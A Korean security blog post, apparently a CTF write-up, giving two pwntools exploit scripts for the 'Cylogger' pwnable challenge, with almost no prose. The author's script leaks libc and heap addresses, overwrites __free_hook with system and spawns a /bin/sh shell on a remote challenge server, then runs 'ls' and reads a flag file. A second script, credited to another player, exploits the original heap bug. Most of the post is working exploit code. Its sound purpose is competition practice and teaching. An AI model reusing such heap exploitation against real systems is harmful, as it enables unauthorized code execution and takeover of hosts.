Notice
Recent Posts
Recent Comments
Link
«   2025/05   »
1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
Tags
more
Archives
Today
Total
관리 메뉴

cdor1's lab

WHL_Cykor - Cylogger 본문

Security/Pwnable

WHL_Cykor - Cylogger

Cdor1 2017. 8. 30. 01:39

서브취약점(OOB-Out Of Bound) 브포해서 풀었지만 실수로 쉘을 날려보낸 슬픈 스토리가 있는 익스코드이다.


from pwn import *
#s = process('./cylogger', env={'LD_PRELOAD':'./libc.so.6'})

while True:
	try:
		s = remote('10.10.200.203', 10002)
		def Leave(select, size, data):
			s.recvuntil('>> ')
			s.sendline('L')
			s.recvuntil('>> ')
			s.sendline(str(select))
			if(select == 1):
				s.recvuntil('Size of Log >>')
				s.sendline(str(size))
			s.sendline(data)

		def See(index):
			s.recvuntil('>> ')
			s.sendline('S')
			s.recvuntil('Index >> ')
			s.sendline(str(index))

		def Remove(index):
			s.recvuntil('>> ')
			s.sendline('R')
			s.recvuntil('Index >> ')
			s.sendline(str(index))

		def reseT():
			s.recvuntil('>> ')
			s.sendline('T')

		def Change(index, data):
			s.recvuntil('>> ')
			s.sendline('C')
			s.recvuntil('Index >> ')
			s.sendline(str(index))
			s.sendline(data)

		def All():
			s.recvuntil('>> ')
			s.sendline('A')

		print s.recvuntil('Ur Name? >>')
		s.sendline('cdor1')
		Leave(1, 1024, 'aaaa')
		Leave(1, 1024, 'bbbb')
		Leave(1, 1024, 'cccc')
		Remove(0)
		Remove(1)
		Leave(1, 1024, 'bbbbbbbb')
		See(1)
		s.recvuntil('bbbbbbbb\n')
		leak = u64(('\x68' + s.recv(5)).ljust(8, '\x00'))
		base = leak - 0x3c2068
		system = base + 0x456a0
		free_hook = base + 0x3c3788
		log.info('leak : ' + hex(leak))
		log.info('base : ' + hex(base))
		log.info('system : ' + hex(system))
		log.info('free_hook : ' + hex(free_hook))
		Change(1, 'b'*16)
		See(1)
		s.recvuntil('Log : bbbbbbbbbbbbbbbb\n')
		heap_leak = u64(('\x00' + s.recv(5)).ljust(8, '\x00'))
		log.info('heap_leak : ' + hex(heap_leak))
		Remove(1)
		Remove(2)

		payload = p64(heap_leak + 0x28)
		payload += p64(0)*2
		payload += p64(heap_leak + 0x28 + 8)
		payload += p64(1)
		payload += p64(free_hook)
		payload += p64(0x64)
		payload += p64(heap_leak + 0x28 + 8) * 120

		Leave(1, 1024, payload)
		for i in range(0, 100):
			Leave(1, 1024, p64(heap_leak + 0x28 + 8) * 127)
		reseT()

		log.info('leak : ' + hex(leak))
		log.info('base : ' + hex(base))
		log.info('system : ' + hex(system))
		log.info('free_hook : ' + hex(free_hook))
		log.info('heap_leak : ' + hex(heap_leak))
		#raw_input()
		Change(606858, p64(system))
		Leave(1, 100, '/bin/sh\x00')
		Remove(0)

		s.sendline("ls")
		print p.recv()
		s.sendline("./flag_x")
		print p.recv()
		s.interactive()
	except Exception as e:
		pass
	finally:
		s.close()

원래 취약점 익스코드 by Demon-이진우


from pwn import *
s = process('./cylogger', env={'LD_PRELOAD':'./libc.so.6'})
#s = remote('10.10.200.203', 10002)

# login
name = 'qwer'
s.recvuntil('>>')
s.sendline(name)

def go(n):
    nl = [0,'L','S','R','T','C','A','E']
    s.recvuntil('xit')
    s.recvuntil('>>')
    s.sendline(nl[n])

def make(t,m,sz=None):
    go(1)
    s.recvuntil('>>')
    s.sendline(str(t))
    if t == 2:
        s.send(m)
    else:
        s.recvuntil('ize of Log >>')
        s.sendline(str(sz))
        s.send(m)

def rm(t): 
    go(3)
    s.recvuntil('Index >>')
    s.sendline(str(t))

def se(t,tt):
    go(5)
    s.recvuntil('Index >>')
    s.sendline(str(t))
    s.send(tt)

for i in range(3):
    make(1,'a',256)

rm(2)
make(1,'a',256)
go(6)
s.recvuntil('[2')
s.recvuntil('Log : a')
lbc = u64('\x00'+s.recvline().replace('\n','').ljust(7,'\x00'))-2816
rm(3);rm(2);rm(1);rm(0)
make(2,'A')
go(6)
s.recvuntil('[0] Log : A')
hp = u64('\x00'+s.recvline().replace('\n','').ljust(7,'\x00'))
rm(0)
for i in range(2):
    make(1,'A'*240+'\x00'*8+'\x30'+'\x00'*7,256)
rm(1);rm(0)
raw_input()
print '0x%x'%lbc
print '0x%x'%hp


'''1. [L]eave log
2. [S]ee my log
3. [R]emove my log
4. rese[T] my log
5. [C]hange my log
6. [A]ll log'''

# go(4)
make(2,'qwer')
make(2,'asdaf')
make(2,'zxcv')
make(2,'1234')
#make(2,'5678')
rm(0)
raw_input('1')
go(4)
raw_input('2')
make(2,'1'*20)
make(2,(p64(0x30)*3)[:-1])
raw_input('3')
#make(3,'3'*20)
make(1,'A'*40,80)
rm(3)
rm(1)
rm(0)

make(1,p64(hp+0x380)+'FASTBINCONTROL',40)
raw_input('4')
rm(1)
raw_input('5')
make(2,'tmp')
raw_input('6')
#make(2,'BOOMB')
make(2,'A'*8+p32(1)+p32(0)+p64(lbc+2800)+p32(8)) #make fake
se(0,p64(lbc-2947503))

s.interactive()


'Security > Pwnable' 카테고리의 다른 글

pwnable.tw SecretGarden  (0) 2017.09.01
pwnable.tw babystack  (0) 2017.08.31
pwnable.tw unexploitable  (0) 2017.08.11
pwnable.tw spirited_away  (0) 2017.08.11
pwnable.tw dubblesort  (0) 2017.08.10
Comments